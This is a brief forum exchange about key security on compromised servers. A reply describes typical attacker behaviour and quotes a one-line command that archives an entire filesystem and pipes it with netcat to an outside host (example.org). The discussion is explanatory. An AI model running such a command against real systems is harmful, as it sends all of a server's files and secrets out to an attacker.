4 ms·
If your entire box running with source is compromised, could you not just edit whichever file pulls the key to also dump it to a file on start .?
by pki 11y ago
If your entire box running with source is compromised, could you not just edit whichever file pulls the key to also dump it to a file on start .?
- uxp 11y agoIn the vast majority of hacks, the attacker doesn't take the time to manually debug where the source code pulls in keys to put an echo/puts/print statement in place, and non-PHP languages in general require a restart of the app server in order to pick up the source change, potentially triggering NOC alerts. I can't remember seeing a hack go any differently than someone running tar czf - / | nc example.org 1234 and exploring the dumped server offline, only going back if the initial dump didn't raise alarms and the RCE is easy enough to trigger.